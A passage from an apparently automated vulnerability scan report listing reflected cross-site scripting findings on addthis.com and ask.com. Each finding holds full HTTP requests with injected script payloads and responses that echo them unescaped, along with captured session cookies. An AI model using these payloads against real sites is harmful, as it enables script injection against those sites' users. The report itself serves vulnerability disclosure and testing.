Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC227f5"-alert(1)-"d6b59968138";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.129. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25f7b<script>alert(1)</script>51cc3c6a826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC?25f7b<script>alert(1)</script>51cc3c6a826=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.3.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYTLLC?25f7b<script>alert(1)</script>51cc3c6a826=1</strong>
...[SNIP]...

2.130. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beebb"-alert(1)-"e38d13d71e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=n8vgn509dukuh80gfrle1a9ug2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/servicesbeebb"-alert(1)-"e38d13d71e9/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx
...[SNIP]...

2.131. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ecf5<script>alert(1)</script>225f6a9584 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=uv8f494h43h01fqra5pp1k3sv4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services7ecf5<script>alert(1)</script>225f6a9584/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130</strong>
...[SNIP]...

2.132. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a576<script>alert(1)</script>28122e63156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=8ubi0bfslihqmjfcvl1u62r5u2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130</strong>
...[SNIP]...

2.133. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa552"-alert(1)-"7ce969362f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rtbcstsg2h8rgbhq9g2pvhc250; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPa
...[SNIP]...

2.134. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d83"-alert(1)-"f43f83f718e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=kai74u0c5hi68smm3pfra1et05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.135. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4df1a<script>alert(1)</script>ff4fc4b5c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=pa4nmf2sogo37cd58aeki3on15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c</strong>
...[SNIP]...

2.136. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9df66<script>alert(1)</script>548f4c9c066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:11:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0urtvj47g39mh5kr9tnnta4sa0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1</strong>
...[SNIP]...

2.137. http://www.ask.com/pictures [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29fdb'%3balert(1)//4d917efb5f3 was submitted in the l parameter. This input was echoed as 29fdb';alert(1)//4d917efb5f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?q=Ohio&o=0&l=29fdb'%3balert(1)//4d917efb5f3&qsrc=3015 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 18:02:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:02:42 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=29fdb';alert(1)//4d917efb5f3"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAyOjQyLVVUQw%3D%3D&po=0&pp=29fdb%27%3Balert%281%29%2F%2F4d917efb5f3; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:42 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:42 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 112554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...



var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=ADABB184D90011265DC483D042F04B4F&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=29fdb';alert(1)//4d917efb5f3';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=p&lodid=us";


...[SNIP]...

2.138. http://www.ask.com/pictures [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the l request parameter is copied into a JavaScript rest-of-line comment (the // left in the string by the earlier l-parameter injection). The payload ec4a3%0aalert(1)//34861841eee was submitted in the l parameter. The %0a was decoded to a literal line break, so the input was echoed as ec4a3, a new line, and then alert(1)//34861841eee in the application's response; the line break ends the comment and leaves alert(1) as executable code.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?q=Ohio&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88aec4a3%0aalert(1)//34861841eee&qsrc=3015 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:02:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:02:46 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88aec4a3 alert(1)//34861841eee"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAyOjQ2LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28DOCUMENT.COOKIES%29%2F%2Fd1f92dec88aec4a3%0Aalert%281%29%2F%2F34861841eee; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:46 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:46 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 117754


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...



